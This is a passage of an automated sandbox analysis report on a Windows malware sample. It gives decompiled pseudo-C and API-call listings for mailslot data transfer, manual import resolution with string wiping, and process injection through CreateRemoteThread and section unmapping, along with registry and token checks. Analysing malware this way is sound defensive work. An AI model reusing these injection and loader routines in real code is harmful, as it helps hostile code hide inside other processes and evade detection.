  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
